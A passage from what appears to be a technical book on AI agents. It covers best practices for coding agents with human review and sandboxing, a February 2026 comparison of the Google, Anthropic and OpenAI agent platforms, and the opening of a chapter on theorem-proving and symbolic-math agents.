Apple entered the agentic coding space on February 3, 2026 with Xcode 26.3, which supports coding agents from Anthropic (Claude) and OpenAI (Codex) directly inside Apple’s IDE. Agents can create files, examine project structure, build and run tests, take image snapshots of their work, and access Apple’s full developer documentation. Critically, Xcode 26.3 exposes its capabilities through the Model Context Protocol (MCP), making it compatible with any MCP-capable agent—not just the two bundled options. This marks the first time a major platform-vendor IDE has shipped native MCP support, signalling that the protocol is becoming the standard integration layer for coding agents across the industry.

Best Practices

Clear Task Boundaries

Define clear boundaries for what agents can and cannot do:

class TaskBoundary:
    """Define boundaries for agent tasks"""
    
    def __init__(self):
        self.max_files = 20
        self.max_lines_per_file = 500
        self.timeout_seconds = 600
        self.protected_patterns = [
            r'\.env.*',
            r'secrets/.*',
            r'\.github/workflows/.*'
        ]
    
    def validate_task(self, task: dict) -> bool:
        """Validate that a task is within boundaries"""
        if len(task.get('files', [])) > self.max_files:
            return False
        
        for file_path in task.get('files', []):
            if any(re.match(p, file_path) for p in self.protected_patterns):
                return False
        
        return True

Incremental Changes

Prefer small, focused changes over large rewrites:

class IncrementalChangeStrategy:
    """Strategy for making incremental changes"""
    
    def execute(self, large_change: Change) -> list:
        """Break large change into incremental steps"""
        
        # 1. Analyze the change
        components = self.decompose(large_change)
        
        # 2. Order by dependency
        ordered = self.topological_sort(components)
        
        # 3. Execute incrementally with validation
        results = []
        for component in ordered:
            result = self.apply_change(component)
            
            # Validate after each step
            if not self.validate(result):
                self.rollback(results)
                raise ChangeValidationError(result)
            
            results.append(result)
        
        return results

Test-Driven Development

Integrate testing into agent workflows:

class TDDAgent:
    """Agent that follows test-driven development"""
    
    async def implement_feature(self, specification: str):
        """Implement feature using TDD approach"""
        
        # 1. Write tests first
        tests = await self.generate_tests(specification)
        await self.write_tests(tests)
        
        # 2. Verify tests fail
        initial_results = await self.run_tests()
        assert not initial_results.all_passed
        
        # 3. Implement to pass tests
        implementation = await self.implement(specification, tests)
        
        # 4. Verify tests pass
        final_results = await self.run_tests()
        
        # 5. Refactor if needed
        if final_results.all_passed:
            await self.refactor_for_quality()
        
        return implementation

Human Review Integration

Always include human checkpoints for significant changes:

Example 7-4. Human review workflow (pseudocode)

# Workflow with human review
name: Agent Implementation with Review
on:
  issues:
    types: [labeled]

jobs:
  implement:
    if: contains(github.event.issue.labels.*.name, 'agent-task')
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v6 # pin to a full SHA in production
      
      - name: Agent Implementation
        id: implement
        uses: ./actions/coding-agent
        
      - name: Create PR for Review
        uses: peter-evans/create-pull-request@v8 # pin to a full SHA in production
        with:
          title: "Agent: $"
          body: |
            ## Agent Implementation
            
            This PR was created by an AI agent based on issue #$.
            
            **Please review carefully before merging.**
          labels: needs-human-review
          draft: true

Note: The ./actions/coding-agent step is a placeholder for your organization’s internal agent runner. Replace it with your approved agent execution mechanism.

Common Challenges

Context Window Limitations

Large codebases exceed agent context windows:

Solution: Implement intelligent context retrieval and summarization.

class ContextCompressor:
    """Compress context to fit within token limits"""
    
    def compress(self, files: list, max_tokens: int) -> str:
        """Compress file contents to fit token limit"""
        
        # Prioritize by relevance
        ranked = self.rank_by_relevance(files)
        
        # Include summaries for less relevant files
        context = []
        tokens_used = 0
        
        for file in ranked:
            if tokens_used + file.tokens <= max_tokens:
                context.append(file.content)
                tokens_used += file.tokens
            else:
                # Include summary instead
                summary = self.summarize(file)
                context.append(summary)
                tokens_used += len(summary.split())
        
        return '\n'.join(context)

Hallucination and Accuracy

Agents may generate plausible but incorrect code:

Solution: Implement validation and testing at every step.

Security Concerns

Agents with code access pose security risks:

Solution: Use sandboxing, permission scoping, and audit logging.

class SecureCodingEnvironment:
    """Secure environment for coding agent execution"""
    
    def __init__(self):
        self.sandbox = DockerSandbox()
        self.audit_log = AuditLog()
    
    async def execute(self, agent, task):
        """Execute agent in secure sandbox"""
        
        # Log the task
        self.audit_log.log_task_start(agent.id, task)
        
        try:
            # Run in sandbox
            result = await self.sandbox.run(agent, task)
            
            # Validate output
            self.validate_output(result)
            
            # Log completion
            self.audit_log.log_task_complete(agent.id, result)
            
            return result
            
        except Exception as e:
            self.audit_log.log_task_error(agent.id, e)
            raise

Key Takeaways

Coding agents have evolved from autocomplete to autonomous development assistants, progressing through phases of increasing capability and independence. The landscape now includes IDE-integrated assistants (Copilot, Cursor, Windsurf), CLI-based agents (Claude Code, Codex CLI, Aider), and fully autonomous agents (Devin).

Multi-agent architectures mirror development teams, with specialised agents for architecture, implementation, testing, and review, each contributing expertise to the overall workflow.

AGENTS.md is the emerging standard for providing agents with project-specific instructions, serving as a “README for agents” that helps them understand how to work within a codebase.

Scaffolding for coding agents includes context management to handle large codebases, tool registries to organise capabilities, and security boundaries to limit what agents can access.

Human review remains essential—agents create PRs for review, not direct commits. This ensures humans maintain oversight over changes that affect production systems.

Incremental changes with continuous validation are safer than large rewrites. Small, focused modifications are easier to review and less likely to introduce subtle bugs.

Security must be designed in from the start: sandboxing isolates agent execution, permissions scope what agents can access, and audit logging tracks what they do.

Agent Platform Comparison: Google, Anthropic, and OpenAI

Chapter Preview

This chapter provides a structured, vendor-neutral comparison of the three dominant agent platforms as of early 2026: Google (Gemini CLI, Vertex AI), Anthropic (Claude Code, Claude API), and OpenAI (Codex CLI, OpenAI Platform). It covers their console and CLI agents, cloud and web platforms, architecture and sandboxing approaches, tool ecosystems, multi-agent patterns, pricing, and enterprise governance. By the end you will understand each platform’s strengths, trade-offs, and ideal use cases, enabling informed decisions for your own agentic workflows.

Note: Treat this chapter as a dated landscape snapshot. Agent platforms evolve rapidly; verify details against current vendor documentation before making adoption decisions.

The Three-Way Platform Race

On and around February 5, 2026, all three companies made major announcements within hours of each other: Anthropic released Claude Opus 4.6 with Agent Teams, OpenAI launched GPT-5.3-Codex and the OpenAI Frontier enterprise platform, and Google continued expanding Vertex AI Agent Builder with enhanced tool governance. This convergence underscores that the agent platform race reached full intensity in early 2026, with each vendor staking out differentiated positions.

Google leads on open protocols and free access. The Gemini CLI is Apache 2.0 licensed with the industry’s most generous free tier, and Google created the Agent-to-Agent (A2A) protocol for cross-framework agent communication.

Anthropic leads on tool sophistication and developer experience. Anthropic created the Model Context Protocol (MCP), and Claude Code offers advanced capabilities like Tool Search and Programmatic Tool Calling that reduce context usage and round-trips.

OpenAI leads on sandboxed security and enterprise identity. The Codex CLI features native OS-level sandboxing, and the new OpenAI Frontier platform introduces per-agent identity with explicit permissions.

Console and CLI Agents

All three vendors offer terminal-based agents that run locally and connect to cloud-hosted models for inference. Each takes a different approach to architecture, tooling, and trust boundaries.

Google Gemini CLI

The Gemini CLI is an open-source agent (Apache 2.0) written in TypeScript and Node.js. It runs a ReAct (reason and act) loop with built-in tools, connecting to Google’s Gemini models for inference. As of v0.27.0, it uses an event-driven scheduler for tool execution.

Default model. Gemini 3 Flash, which outperforms Gemini 2.5 Pro at three times the speed and lower cost.

Context window. 1 million tokens, the largest among the three CLI agents.

Built-in tools. read_file, write_file, web_fetch, google_search (grounding), and shell command execution. Full MCP server support via local stdio and remote transports.

Subagent architecture. Sub-agents are specialists that the main agent can delegate to, each with its own system prompt and restricted toolset. Sub-agents use JSON schema for input and are tracked by an AgentRegistry. Uniquely, Gemini CLI supports remote sub-agents via the A2A protocol, enabling cross-framework delegation that no other CLI agent offers natively.

Agent Skills. The Agent Skills format (a portable folder with SKILL.md following the Agent Skill Schema) is a stable feature. These skills also work in Claude Code, Copilot, and Cursor.

Free tier. 60 requests per minute and 1,000 requests per day with a personal Google account — the largest free allowance in the industry. Paid upgrades are available through Google AI Pro ($19.99/month) or AI Ultra subscriptions, plus enterprise options via Vertex AI.

Anthropic Claude Code

Claude Code is Anthropic’s official agentic CLI, written in TypeScript and Node.js. Unlike Gemini CLI and Codex CLI, it is proprietary (not open-source). It provides full filesystem access, Git integration, and extensibility through MCP.

Default model. Claude Opus 4.6, the flagship model released February 5, 2026.

Context window. 200,000 tokens standard, with a 1 million token beta available at premium rates.

Built-in tools. A rich set including file read/write, Bash execution, Glob (pattern-based file search), Grep (content search), Edit (precise string replacement), Write, NotebookEdit, WebSearch, and WebFetch. Claude Code also supports full MCP server integration.

Subagent architecture. Built-in subagent types include Explore (fast codebase search), Plan (implementation design), and general-purpose agents. Custom subagents can be defined with dedicated system prompts, specific tool access, independent permissions, and optional persistent memory directories. Claude Code can run up to seven simultaneous operations in parallel.

Agent Teams. A research preview launched with Opus 4.6 enables a lead session to spawn multiple independent teammates, each with its own full context window. The recommended configuration is two to five teammates with five to six tasks each. Teammates can message each other directly and the lead synthesizes results. In a stress test, 16 agents wrote a 100,000-line Rust C compiler across roughly 2,000 sessions.

Advanced tool capabilities. The Tool Search Tool (beta) lets Claude search semantically across thousands of tool definitions without loading them all into the context window, reducing token overhead by roughly 85 percent. Programmatic Tool Calling (beta) lets Claude write code in an execution container to call multiple tools without additional round-trips.

Project instructions. Claude Code uses CLAUDE.md and AGENTS.md convention files for per-project and per-directory instructions, giving teams fine-grained control over agent behaviour in different parts of a codebase.

OpenAI Codex CLI

The Codex CLI is an open-source agent (Apache 2.0) written in Rust. It is the only CLI agent among the three with native OS-level sandboxing, making security a core differentiator.

Default model. GPT-5.3-Codex, which is 25 percent faster than GPT-5.2-Codex and combines frontier coding performance with GPT-5.2’s reasoning capabilities.

Built-in tools. File read/write, shell commands, and web search (served from cache by default for security). MCP support is available via the Connector Registry in enterprise deployments.

Native sandboxing. This is Codex CLI’s defining feature. On Linux, it uses bubblewrap-based sandboxing with configurable read-only access policies, shell environment controls, and approval modes. On Windows (experimental), it uses AppContainer-based sandboxing with restricted tokens and capability SIDs. In cloud mode, it runs in isolated OpenAI-managed containers with network access disabled by default. By default, agents are limited to editing files in the working folder and branch, with explicit approval required for elevated permissions.

Parallel agents. Codex supports multiple agents running simultaneously across projects using Git worktrees, both locally and via cloud environments. The desktop app (macOS) can orchestrate multiple AI coding agents in parallel.

CLI Comparison Table

Dimension	Google Gemini CLI	Anthropic Claude Code	OpenAI Codex CLI
Language	TypeScript/Node.js	TypeScript/Node.js	Rust
License	Apache 2.0	Proprietary	Apache 2.0
Default model	Gemini 3 Flash	Claude Opus 4.6	GPT-5.3-Codex
Context window	1M tokens	200K (1M beta)	Varies by model
Native sandbox	No	No (hooks for validation)	Yes (bubblewrap, AppContainer)
MCP support	Consumer	Creator; producer and consumer	Consumer (via Connector Registry)
A2A support	Producer and consumer	No	No
Subagent model	Specialists + remote A2A agents	Explore/Plan/custom + Agent Teams	Parallel via worktrees
Free tier	60 req/min, 1K req/day	None (API-based)	None (API-based)
Agent Skills (SKILL.md)	Stable	Supported	Via AgentKit

Cloud and Web Platforms

Beyond CLI agents, each vendor offers a cloud platform for building, deploying, and managing agents at scale. These platforms differ significantly in their approach to agent development, deployment, and governance.

Google: AI Studio and Vertex AI Agent Builder

Google’s cloud agent story spans two tiers. AI Studio is a browser-based prototyping environment for Gemini models, offering free access to the Gemini API for experimentation. Vertex AI Agent Builder is the full-stack enterprise platform for the entire agent lifecycle.

Agent Development Kit (ADK). An open-source Python framework (with Java support in development) for building multi-agent systems. Production-ready agents can be built in under 100 lines of Python. ADK provides a rich tool ecosystem including pre-built tools, custom functions, OpenAPI specs, and MCP tools.

Cloud API Registry. An enterprise governance layer where administrators curate and approve tools across the organization. Apigee integration transforms existing managed APIs into custom MCP servers, bridging the gap between existing enterprise infrastructure and agentic workflows.

A2A protocol integration. ADK agents can be exposed as A2AServer instances for cross-framework agent communication. Over 50 enterprise partners (Box, Deloitte, Elastic, PayPal, Salesforce, ServiceNow, UiPath, among others) are committed to A2A.

Deployment. Agents built with ADK deploy to the Vertex AI Agent Engine, with sessions and memory support now generally available. Pricing was lowered in January 2026.

Anthropic: Claude Console and API Platform

Anthropic’s cloud offering centres on the Claude Developer Platform (platform.claude.com), providing API access to all Claude models alongside the Claude Agent SDK.

Agent SDK. Available in both Python and TypeScript, the Agent SDK (renamed from “Claude Code SDK” to reflect its broader applicability) provides the same tools, agent loop, and context management that power Claude Code. Agents built with the SDK can autonomously read files, run commands, search the web, and edit code.

TeammateTool. The official multi-agent orchestration primitive, launched alongside Opus 4.6. It enables a lead agent to spawn teammates with dedicated context windows and coordinate their work through message passing.

Computer Use. Claude can interact with graphical user interfaces through screenshots and mouse/keyboard actions. Claude Sonnet 4.5 leads the OSWorld benchmark at 61.4 percent, making it the most capable computer-use model available. Computer Use is supported on Claude 3.5 Sonnet v2, Sonnet 4, Sonnet 4.5, Haiku 4.5, and Opus 4.

Cowork. A research preview desktop app (macOS) that brings agentic capabilities to knowledge work. Cowork runs with local VM access, file access, and MCP integrations, extending Claude’s reach beyond coding into general productivity tasks.

Cross-cloud availability. Claude models are available not only through Anthropic’s own API but also on AWS Bedrock and Google Cloud Vertex AI, giving enterprises flexibility in where they run inference.

OpenAI: ChatGPT and API Platform

OpenAI has consolidated its platform around the Responses API (replacing the Assistants API, which sunsets August 26, 2026) and launched OpenAI Frontier as the enterprise agent platform.

Responses API. A simpler interaction model compared to the Assistants API: send input items, receive output items. It includes built-in tools for web search, file search, and computer use. The Conversations API adds durable threads and replayable state for long-running agent interactions.

Agents SDK. An open-source Python SDK that is the production-ready evolution of Swarm. Core primitives include Agents (LLMs plus instructions plus tools), Handoffs (agent-to-agent delegation), and Guardrails (input/output validation). Built-in tracing enables visualization, debugging, evaluation, and fine-tuning.

AgentKit. A suite of tools for building and deploying agents. Agent Builder provides a visual canvas for composing multi-agent workflows with drag-and-drop nodes, preview runs, inline evaluation, and full versioning (beta). ChatKit offers a toolkit for embedding chat-based agent experiences in products (generally available). The Connector Registry is a central admin hub for data and tool connections, including pre-built connectors for Dropbox, Google Drive, SharePoint, and Teams, plus third-party MCP servers (beta).

OpenAI Frontier. Launched February 2026, this enterprise platform is built on four pillars: Business Context, Agent Execution, Evaluation and Optimization, and Enterprise Security and Governance. A distinctive feature is that each AI agent receives its own identity with explicit permissions and guardrails, bringing agent governance closer to how enterprises manage human user identities.

Cloud Platform Comparison Table

Dimension	Google Vertex AI	Anthropic Claude Platform	OpenAI Platform
Agent SDK language	Python (Java coming)	Python and TypeScript	Python
Multi-agent mechanism	ADK delegation + A2A	TeammateTool + Agent SDK	Handoffs + AgentKit Builder
Visual agent builder	No (code-first)	No (code-first)	Yes (AgentKit Agent Builder)
Enterprise platform	Vertex AI Agent Builder	Claude Enterprise	OpenAI Frontier
Cross-cloud	Native (Google Cloud)	AWS Bedrock + Google Cloud	Native (OpenAI)
Computer use	No native offering	Yes (Sonnet 4.5 leads OSWorld)	Yes (via Responses API)
Tool governance	Cloud API Registry	Managed policy settings	Connector Registry
Key differentiator	A2A protocol, open ADK	Tool sophistication, computer use	Visual builder, agent identity

Architecture and Sandboxing

The three platforms take fundamentally different approaches to trust boundaries and code execution safety.

OpenAI Codex CLI offers the strongest isolation. Its bubblewrap-based sandbox on Linux restricts filesystem access to the working directory by default, disables network access, and requires explicit approval for elevated permissions. On Windows, AppContainer provides similar isolation through restricted tokens. In cloud mode, each agent runs in a dedicated container with no network access by default. This makes Codex CLI the safest choice for environments where untrusted code execution is a concern.

Anthropic Claude Code runs with the user’s filesystem permissions and relies on a hooks system for validation rather than OS-level sandboxing. PreToolUse and PostToolUse hooks let teams intercept and validate tool calls before and after execution, providing a flexible but opt-in safety layer. For production deployments that require stronger isolation, teams typically run Claude Code inside containers or virtual machines.

Google Gemini CLI also lacks native sandboxing, running with the user’s permissions. Security is managed through tool-level controls and MCP server configuration. Like Claude Code, stronger isolation requires external containerization.

Tip: For enterprise adoption, consider the sandboxing requirements of your security posture. If native isolation is mandatory, Codex CLI provides it out of the box. If your teams already run agents inside containers (Docker, microVMs), the sandboxing difference matters less.

Example 8.5-1. Codex CLI sandbox configuration (illustrative)

# Codex CLI with full sandbox (default on Linux)
codex --approval-mode suggest

# Codex CLI with network access enabled (requires explicit opt-in)
codex --approval-mode auto-edit --full-auto

# Claude Code with PreToolUse hook for validation
# Configured in .claude/settings.json:
# { "hooks": { "PreToolUse": [{ "matcher": "Bash",
#     "command": "validate-command.sh" }] } }
claude

# Gemini CLI with restricted tool access
gemini --tools read_file,write_file,google_search

Tool Ecosystems and Protocol Support

MCP (Model Context Protocol)

MCP, created by Anthropic and donated to the Agentic AI Foundation (AAIF) under the Linux Foundation, standardizes how agents connect to tools and data sources. It defines a client-server protocol where agents (clients) discover and invoke tools exposed by MCP servers.

All three CLI agents support MCP as consumers. Anthropic additionally acts as an MCP producer, exposing Claude Code’s own capabilities as MCP servers. The protocol is the closest the industry has to a universal agent-to-tool standard. See Skills and Tools Management for detailed MCP coverage.

A2A (Agent-to-Agent Protocol)

A2A, created by Google, addresses a different layer: agent-to-agent communication rather than agent-to-tool communication. While MCP handles vertical integration (connecting an agent to tools), A2A handles horizontal integration (connecting agents to each other).

A2A is built on HTTP, Server-Sent Events, and JSON-RPC, with gRPC support for high-throughput scenarios. Agents publish Agent Cards that describe their capabilities, enabling dynamic discovery. Over 50 enterprise partners have committed to A2A. However, as of February 2026, neither Anthropic nor OpenAI has adopted A2A natively; their agents communicate through platform-specific mechanisms. See Agent Orchestration for more on A2A.

AGENTS.md Convention

The AGENTS.md convention, created by OpenAI and donated to AAIF, provides a standardized way to include agent instructions in a repository. All three CLI agents honour this convention in some form: Gemini CLI reads AGENTS.md files directly, Claude Code supports both AGENTS.md and its own CLAUDE.md convention, and Codex CLI processes AGENTS.md files for project context.

Agentic AI Foundation (AAIF)

In December 2025, the Agentic AI Foundation was formed under the Linux Foundation, co-founded by Anthropic, Block, and OpenAI. Platinum members include AWS, Bloomberg, Cloudflare, Google, and Microsoft. The three founding projects are MCP (from Anthropic), goose (from Block), and AGENTS.md (from OpenAI). AAIF’s existence signals industry alignment on shared standards despite fierce competition between the vendors.

Protocol	Created by	Google	Anthropic	OpenAI
MCP	Anthropic	Adopted	Created, donated to AAIF	Adopted (March 2025)
A2A	Google	Created	Not adopted	Not adopted
AGENTS.md	OpenAI	Supported	Supported (plus CLAUDE.md)	Created, donated to AAIF

Multi-Agent Patterns

Each platform offers distinct primitives for multi-agent orchestration. The patterns differ in how agents discover each other, share context, and coordinate work.

Google ADK uses explicit delegation. A parent agent delegates tasks to child agents within the same ADK application, or to remote agents via A2A. The A2A integration means ADK agents can collaborate with agents built on entirely different frameworks, provided those frameworks also implement A2A.

Example 8.5-2. Google ADK multi-agent delegation (illustrative pseudocode)

from google.adk import Agent, AgentGroup

researcher = Agent(
    name="researcher",
    model="gemini-3-flash",
    instructions="Research the given topic thoroughly.",
    tools=[google_search, web_fetch]
)

writer = Agent(
    name="writer",
    model="gemini-3-flash",
    instructions="Write clear, concise content based on research.",
    tools=[file_write]
)

team = AgentGroup(
    agents=[researcher, writer],
    orchestration="sequential"  # researcher runs first, writer second
)

result = team.run("Write a summary of recent MCP developments")

Anthropic Agent Teams uses a lead-and-teammate model. The lead session spawns independent teammates, each with its own full context window. Teammates can message each other and the lead coordinates their output. The TeammateTool API provides the programmatic interface for this pattern.

Example 8.5-3. Anthropic Agent Teams pattern (illustrative pseudocode)

from claude_agent_sdk import Agent, TeammateTool

lead = Agent(
    model="claude-opus-4-6",
    tools=[TeammateTool(
        teammates={
            "researcher": {"prompt": "Research the given topic."},
            "reviewer": {"prompt": "Review content for accuracy."}
        },
        max_teammates=3
    )]
)

# Lead delegates research, then passes results to reviewer
result = lead.run("Research and review recent A2A protocol adoption")

OpenAI Agents SDK uses Handoffs. An agent explicitly transfers control to another agent, along with the conversation context. This is a production-ready evolution of the Swarm framework. AgentKit’s Agent Builder adds a visual layer on top for composing these flows graphically.

Example 8.5-4. OpenAI Agents SDK handoff pattern (illustrative pseudocode)

from agents import Agent, handoff

researcher = Agent(
    name="researcher",
    model="gpt-5.3-codex",
    instructions="Research the given topic.",
    tools=[web_search]
)

writer = Agent(
    name="writer",
    model="gpt-5.3-codex",
    instructions="Write content based on research.",
    handoffs=[handoff(target=researcher)]  # can hand back to researcher
)

# Orchestration via handoffs between agents
result = writer.run("Write a summary of recent MCP developments")

Multi-Agent Comparison

Dimension	Google (ADK)	Anthropic (Agent Teams)	OpenAI (Agents SDK)
Orchestration model	Delegation (parent-child)	Lead-teammate messaging	Handoffs (explicit transfer)
Cross-framework	Yes (via A2A)	No (platform-specific)	No (platform-specific)
Max parallel agents	Not specified	2-5 teammates recommended	Multiple via worktrees
Visual builder	No	No	Yes (AgentKit)
Context sharing	Agent Card metadata	Full context per teammate	Conversation context on handoff

Pricing and Cost Optimization

API pricing varies significantly across vendors and models. The following table compares the primary models used in each CLI agent.

API Pricing (per million tokens)

Model	Input	Output	Notes
Gemini 3 Flash	Very low	Very low	Free tier: 1K req/day
Claude Opus 4.6	$5.00	$25.00	Batch API: 50% off
Claude Sonnet 4.5	Lower	Lower	Best computer-use model
Claude Haiku 4.5	Lowest	Lowest	Fast, cost-effective
GPT-5 Codex	$1.25	$10.00	Standard API pricing
codex-mini-latest	$1.50	$6.00	Lighter-weight option

Subscription Tiers

Tier	Google	Anthropic	OpenAI
Free	Gemini CLI (1K req/day)	None	None
Individual	AI Pro $19.99/mo	Pro $20/mo	Plus $20/mo
Power user	AI Ultra (higher)	Max $100-200/mo	Pro $200/mo
Team	Gemini Code Assist	Team $30/user/mo	Team plan
Enterprise	Vertex AI contracts	Enterprise plan	Frontier contracts

Cost-Saving Mechanisms

Google relies on its generous free tier and low per-token pricing for Gemini Flash models. For most experimentation and small-to-medium workloads, the free tier alone may suffice.

Anthropic offers two significant cost-reduction features. The Batch API provides a 50 percent discount for non-time-sensitive workloads. Prompt Caching can reduce costs by up to 90 percent for repeated context (system prompts, large documents, tool definitions).

OpenAI offers a Batch API for bulk processing and competitive per-token rates on Codex models. The codex-mini-latest model provides a lower-cost option for lighter tasks.

Tip: For cost-sensitive workloads, consider using lighter models (Gemini Flash, Claude Haiku, codex-mini) for routine tasks and reserving flagship models (Gemini 3 Pro, Opus 4.6, GPT-5.3-Codex) for complex tasks. All three platforms support model routing, letting you match model capability to task complexity.

Enterprise Governance and Security

Enterprise adoption requires more than raw model capability. Governance, compliance, and security controls often determine which platform an organization can use.

Compliance Certifications

Certification	Google	Anthropic	OpenAI
SOC 2	Yes (Type II)	Yes	Yes (Type II)
ISO 27001	Yes	Yes	Yes
ISO 27017/27018	Yes	Pending	Yes
ISO 27701	Yes	Pending	Yes
HIPAA	Yes (BAA available)	Yes (alignment)	Yes
CSA STAR	Yes	Pending	Yes

Tool Governance

Each vendor takes a different approach to controlling which tools agents can access.

Google Cloud API Registry lets administrators curate approved tool sets across the organization. Combined with Apigee, it transforms existing managed APIs into governed MCP servers with usage tracking and access control.

Anthropic Managed Policies provide organization-level settings that control tool permissions and file access restrictions. The Compliance API offers programmatic access to usage data for auditing, governance, and real-time flagging. BYOK (Bring Your Own Key) encryption support is planned for the first half of 2026.

OpenAI Connector Registry serves as a central admin hub for data and tool connections. OpenAI Frontier introduces per-agent identity, where each AI agent receives its own identity with explicit permissions and guardrails, similar to how enterprises manage human user access.

Audit and Monitoring

Capability	Google	Anthropic	OpenAI
Audit trails	End-to-end observability	Compliance API	Detailed audit logs
Real-time monitoring	Cloud Monitoring integration	Real-time flagging via API	Built-in monitoring
Agent identity	Google Cloud IAM	Organization-level seats	Per-agent identity (Frontier)
Data residency	Regional options	US/EU options	Regional options

Warning: Agent governance is evolving rapidly. Before deploying agents in regulated environments, verify current compliance certifications and data handling policies directly with each vendor. The information in this table reflects February 2026 status.

Choosing a Platform

No single platform dominates every scenario. The right choice depends on your use case, existing infrastructure, security requirements, and team preferences.

Choose Google when you need open protocols and cross-framework interoperability (A2A), want the most generous free tier for experimentation, or your organization already runs on Google Cloud. Google’s ADK is also the strongest choice when you need agents from different vendors or frameworks to communicate with each other.

Choose Anthropic when tool sophistication and developer experience are priorities. Claude Code’s Tool Search, Programmatic Tool Calling, and Agent Teams offer capabilities the others lack. Anthropic is also the only vendor offering production-grade computer use (GUI interaction) and cross-cloud availability on both AWS and Google Cloud.

Choose OpenAI when sandboxed security is non-negotiable, when you need a visual agent builder for non-developer stakeholders, or when per-agent identity management aligns with your governance model. OpenAI Frontier is the most enterprise-security-focused platform of the three.

Use multiple platforms when your organization has diverse needs. Many enterprises run multiple agent platforms simultaneously, using each where it excels. GitHub’s Agent HQ surface already supports assigning tasks to Copilot, Claude, or Codex side by side, normalising multi-vendor agent usage within a single development environment. See Agents for Coding for detailed coverage of Agent HQ and individual coding agent platforms.

Key Takeaways

The agent platform landscape in early 2026 is a three-way race with clear differentiation: Google leads on open protocols and free access, Anthropic on tool sophistication and developer experience, and OpenAI on sandboxed security and enterprise identity. All three support MCP as the emerging standard for agent-to-tool communication, while A2A (Google-only for now) addresses agent-to-agent communication. For most organizations, the choice is not exclusive — multi-platform strategies are becoming the norm, with GitHub Agent HQ and the Agentic AI Foundation both pushing toward interoperability. The protocols and governance mechanisms covered in this chapter are evolving rapidly; revisit vendor documentation regularly to track changes. For deeper coverage of the tools, protocols, and orchestration patterns referenced here, see Agent Orchestration, Skills and Tools Management, and Future Developments.

Agents for Mathematics and Physics

Chapter Preview

This chapter identifies where formal methods and computer algebra system (CAS) tools fit in agent workflows, explaining how they complement neural approaches. It separates runnable tooling from conceptual pseudocode, providing clear labels so readers know what can be executed directly. Finally, it highlights verification pitfalls and how to avoid them, addressing the unique challenges of mathematical and scientific correctness.

Note: Many examples in this chapter are illustrative pseudocode unless explicitly labeled as runnable, because formal tooling and CAS systems require environment-specific setup.

Introduction

Mathematics and physics present unique challenges for AI agents. Unlike coding, where correctness can often be verified through tests, mathematical reasoning requires formal proof and physical models demand empirical validation. This chapter explores specialized agents for scientific domains, their architectures, and the scaffolding required to support rigorous reasoning.

The Landscape of Scientific Agents

Distinct Requirements

Scientific agents differ from coding agents in several key ways:

Aspect	Coding Agents	Scientific Agents
Verification	Tests, linting	Formal proofs, experimental validation
Precision	Functional correctness	Mathematical rigor
Output	Source code	Theorems, proofs, equations
Tools	IDEs, compilers	Proof assistants, CAS, simulators
Context	Codebase	Theorems, papers, datasets

Categories of Scientific Agents

Scientific agents fall into five main categories.

Theorem Proving Agents construct formal proofs in systems like Lean (https://lean-lang.org/learn/), Coq (https://coq.inria.fr/), or Isabelle (https://isabelle.in.tum.de/), producing machine-verifiable derivations.

Symbolic Computation Agents work with computer algebra systems (CAS), manipulating mathematical expressions symbolically rather than numerically.

Numerical Simulation Agents set up and run physics simulations, handling the computational infrastructure for modelling physical systems.

Research Assistants search literature, summarise findings, and identify gaps, helping researchers navigate the vast body of published work.

Educational Scaffolding Agents help students learn mathematical and physical concepts, adapting explanations to the learner’s level and addressing misconceptions.

Theorem Proving Agents

Formal Verification Background

Formal theorem proving ensures mathematical correctness through rigorous logical derivation. Unlike informal proofs in papers, formal proofs are machine-verifiable.

Ax-Prover Architecture

Note: Ax-Prover is a hypothetical composite example used to illustrate multi-agent theorem proving patterns.

class AxProverAgent:
    """Multi-agent theorem proving architecture inspired by Ax-Prover"""
    
    def __init__(self, llm, proof_assistant):
        self.llm = llm
        self.proof_assistant = proof_assistant  # e.g., Lean, Coq
        self.strategy_agents = {
            'decomposition': DecompositionAgent(llm),
            'lemma_search': LemmaSearchAgent(llm),
            'tactic_selection': TacticSelectionAgent(llm),
            'creativity': CreativityAgent(llm)
        }
    
    async def prove(self, theorem: str) -> ProofResult:
        """Attempt to prove a theorem"""
        
        # 1. Formalize the statement
        formal_statement = await self.formalize(theorem)
        
        # 2. Decompose into subgoals
        subgoals = await self.strategy_agents['decomposition'].decompose(
            formal_statement
        )
        
        # 3. Search for relevant lemmas
        lemmas = await self.strategy_agents['lemma_search'].search(
            formal_statement, subgoals
        )
        
        # 4. Generate proof attempts
        proof_attempts = await self.generate_proof_attempts(
            formal_statement, subgoals, lemmas
        )
        
        # 5. Verify with proof assistant
        for attempt in proof_attempts:
            result = await self.proof_assistant.check(attempt)
            if result.verified:
                return ProofResult(success=True, proof=attempt)
        
        return ProofResult(success=False, partial_proofs=proof_attempts)
    
    async def formalize(self, natural_language: str) -> str:
        """Convert natural language to formal notation"""
        prompt = f"""
        Convert the following mathematical statement to formal Lean 4 syntax:
        
        Statement: {natural_language}
        
        Provide the formal statement only.
        """
        return await self.llm.generate(prompt)

Integration with Proof Assistants

Agents connect to proof assistants through well-defined interfaces:

class LeanProofAssistant:
    """Interface to Lean 4 proof assistant"""
    
    def __init__(self, project_path: str):
        self.project_path = project_path
        self.server = LeanServer(project_path)
    
    async def check(self, proof: str) -> VerificationResult:
        """Verify a proof in Lean"""
        
        # Write proof to file
        proof_file = self.write_proof(proof)
        
        # Run Lean verification
        result = await self.server.check_file(proof_file)
        
        return VerificationResult(
            verified=not result.has_errors,
            errors=result.errors,
            goals=result.remaining_goals
        )
    
    async def get_available_tactics(self, goal_state: str) -> list:
        """Get tactics applicable to current goal state"""
        return await self.server.suggest_tactics(goal_state)
    
    async def search_mathlib(self, query: str) -> list:
        """Search Mathlib for relevant lemmas"""
        return await self.server.library_search(query)

Challenges in Theorem Proving

Theorem proving presents four main challenges.

Search space explosion means proofs can have many possible paths, and exploring all of them quickly becomes computationally infeasible.

Creativity required reflects that non-obvious proof strategies often lead to success, requiring agents to generate novel approaches rather than following templates.

Formalisation gap is the challenge of translating informal mathematical statements into the precise syntax required by proof assistants.

Domain knowledge recognises that deep mathematical understanding is needed to guide proof search effectively and choose appropriate lemmas.

Symbolic Computation Agents

Computer Algebra Systems

Symbolic computation agents work with systems like Mathematica, SymPy, or SageMath:

class SymbolicComputationAgent:
    """Agent for symbolic mathematical computation"""
    
    def __init__(self, llm, cas_backend='sympy'):
        self.llm = llm
        self.cas = self.initialize_cas(cas_backend)
    
    async def solve(self, problem: str) -> Solution:
        """Solve a mathematical problem symbolically"""
        
